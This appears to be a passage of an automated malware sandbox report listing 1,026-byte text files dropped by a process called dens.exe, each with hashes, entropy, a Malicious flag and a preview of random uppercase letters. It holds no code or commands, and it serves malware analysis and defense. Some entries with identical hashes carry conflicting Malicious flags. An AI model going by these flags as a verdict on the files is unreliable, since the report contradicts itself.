                                                                                                                                                                                                                                            Preview:NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.699434772658264
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                                                                                                                                                                                            MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                                                                                                                                                                                            SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                                                                                                                                                                                            SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                                                                                                                                                                                            SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Preview:ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.695685570184741
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                                                                                                                                                            MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                                                                                                                                                            SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                                                                                                                                                            SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                                                                                                                                                            SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.695685570184741
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                                                                                                                                                            MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                                                                                                                                                            SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                                                                                                                                                            SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                                                                                                                                                            SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.694311754777018
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:A8RGU2wNw6pbc5fP6UBtRzjn+4sNp3GYuf5/4dImDNR4+R00JOGJP89a:Aw4w9h+fiUBtJj+44pc3mDL4+R0MVJ/
                                                                                                                                                                                                                                            MD5:61908250A5348CC047FF15260F730C2B
                                                                                                                                                                                                                                            SHA1:CBCF34156EAE25B328A926E21008598EE8D1CBDE
                                                                                                                                                                                                                                            SHA-256:8700BF8369D39FD5DF142F9482CE8860BD8A26A3304EFBC57CBF9E45782C7A3A
                                                                                                                                                                                                                                            SHA-512:BCAB9A36BF1111B05BC52D8921CAC19ABC0FA18D93EA4EB9866DF4B31624FFCA2FF55A09C5051DC2AECAB18828BA8FDA5F31FA0F1E1B7CDC51DF39041E2A82F3
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:UOOJJOZIRHPVBWNJCWUSWUNTMYTRIXAVHMVNTYLIPCAYUDIDHLMFMKJROINQAVRXUZLNINNJJSHFEFPSZPLVVWBUDRECRECFHEVVEZDHIFPUKQTLDLWAAKNHNLRQDSPWEEVMZICDCINAORJHMIUUNNJHMWJLZHCNXQIZIPHJPLEDKWATEVYJSWRRMCEJGQXHFBOGXKHJFORHFMGMLTTZJKPJBYMKZVWGZAIGHCFNXGRNDDLJZMCZBXDTQVGPSMNLFNFDHXXCXDJJUNSVHDRBZEZFIUQIYSJVDHEFPPPROTSFKVYAURVOKTIKGYYSWJMCPHHISKCOIVXEIQWZICSWMZJVHXNBACFJZRIEQPOISHMZILEXPCMYBSQRASRNWPSMMYPWJFEXHUUJQAMZDZSIKVETWBZUQBTDCCOYIIJFYYHXPZIUCZRQQFYTKLLGWQPTPZJIZHUEFVCDUNPMVORWJRIAYGRRAHBFWKSAMTDEVSHQXJBHBMOINFGNSRFJDWPSMFABPWRZHIOIPNMLHKGNVWQJYVTWLEZDGMBOJLNHPJKWMHWBVAEGELRTQORSRZQBNXOXEHQJHOEQVNZZJSGWQGINLWNPWFSJNPGRBFOBAEJAOEEMVKZTQZEVVODQLWGPNPNOPXEXLEESZERAPVAPHAUNNCEHTNMFJYBTYGSNGBIEDWGUTNCJDESWGYITWPGBEFVMZYUYPQOQBFITFPUQTWZNQFLWVTMUIAOXBCINJDYCHTXVFQFJQSMNUTYABAAOGGEUKHMDYKLCSGIBIFQSYOIRBUYVSCPDGMVNAQBKZPEKHNRNDPIHOUUTPJDKDOACRPOMZOQCOIAOBNPJLJIYDLQLQUMPIRAMVWNBCMMWFDLTUGWRDVGNHOOODYTHAGWDMJKRVJZFYCVLFLQUWEILFSEPBEADHBHFVWZGUZKNXQCRSBRLGIVTWCSHGFTTTPQAKFWFDXDYXWAWDKWXXTMSJSVOBRAYZGGBDPJOGLIZ
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.701757898321461
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                                                                                                                                                                                            MD5:520219000D5681B63804A2D138617B27
                                                                                                                                                                                                                                            SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                                                                                                                                                                                            SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                                                                                                                                                                                            SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.701757898321461
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                                                                                                                                                                                            MD5:520219000D5681B63804A2D138617B27
                                                                                                                                                                                                                                            SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                                                                                                                                                                                            SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                                                                                                                                                                                            SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.701757898321461
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                                                                                                                                                                                            MD5:520219000D5681B63804A2D138617B27
                                                                                                                                                                                                                                            SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                                                                                                                                                                                            SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                                                                                                                                                                                            SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.697336881644685
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:DVE9Jf1tiezZxapTBz4fmlhQHdwc6WS/ZCGxruwyJM:Deu8xafWWKHj6Zx
                                                                                                                                                                                                                                            MD5:08AF516B9E451DB9845289801A21F1BC
                                                                                                                                                                                                                                            SHA1:D43E58D334ACFAE831AD929003D89DC6D3B499F9
                                                                                                                                                                                                                                            SHA-256:C459EA8FCABD26C75606F78F91AA8446698D90422EE4869ABE4ABCCB50B45379
                                                                                                                                                                                                                                            SHA-512:C8C2BB634740DBDDC5928E5FD3960011BB86842B72673FDCE2D65C86AE6D5945F0C88E81AE96DEA711CC654FAC8B4EC809DF18F57BFB4129503DE37E426CF055
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:WKXEWIOTXIKPVKMTOJVZKCCJOJQJVVBUCRVSCWBTZFRFCLMJEFYWDAADXDSWAVKQUKEQVBGBEVVYQQKRCSDIQBFHQPNUHXEGBVBQAZXUXMBFNLNCNTBFAMVYZJITBIGADWSFAFETGWVSLSMWHTRSSUNGFAPUBMTUYBFNDIWUKESLBWQSCOTLFFHGDQBTCYHJBCBOARQTWMUDRIUXIXOCLDIEADCRMXGAMQGVIRNLAGTALJHBZWRNXXRRBLYDOAYCBGEJCTGYVJXPIAIVUAKQQBRSXZKMFBMWWCHMTGNMNRBVSOTUFWOEJRLHHVPMJECGASFUTKIEPJVDDGJBEAOSKQSOAKQFVDMPVFZXVQQGBIVNAKYSEGLMWLAYDYTALUJSLPWCLEJKQBXBYHAKPFMJEIYHGDOFGQSDOCEQICJNJHPIMYZXEEBLQDGZQJHXKMNXDWJCMMFBONBYYWLDOKPYOROQOAOXKLNFZNGOBDFJUKRZTHKLRBINVCYAUIXORJECNOHLVMBHPPCTEWZMHAKKOWVWNWGYCHRMUWRNDXFYYWTIGTCJKQDPGUNHAJQDLUZMXHCGTFUQBMGYHZZQTDVDXANXWNWKFTJJGQDHQOXVXPQVSIEKEEJXYUACENKWKIJBJQXHMLMPZXYAVPNORKZSDXAKFPVLVKXAALPKPLPVFPCSRBEEJDNJCIJXXOCNXCBVGHIYCQQVQHTTNURHGTJJXKJRPJEGOUFOHMMCJGVNMXOAXZBVGWVBLQZNFUTGTNMFHQOEJPQLIMHIWPQHWMJJDCVVMWJEEFQQZJEEECMHCCUANTBJYRWUCSJSOHYMSBWTKOKBZPVNMIVCLDDALCEUFSLAOCOCSAXADDYPCSIANHKQFGMSMYTDVKAOIYTWPDDCRKDNZYGXHYDSDFXTLUDKREZTPVBCYOHCUNIFNCKBSSGTENGDYROMJUTSSFWEEFXLJPBMSINKXZCEUWQMDWGNHDWNFHYTECVIYIAPNGWL
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.69156792375111
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
                                                                                                                                                                                                                                            MD5:A4E170A8033E4DAE501B5FD3D8AC2B74
                                                                                                                                                                                                                                            SHA1:589F92029C10058A7B281AA9F2BBFA8C822B5767
                                                                                                                                                                                                                                            SHA-256:E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
                                                                                                                                                                                                                                            SHA-512:FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Preview:XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
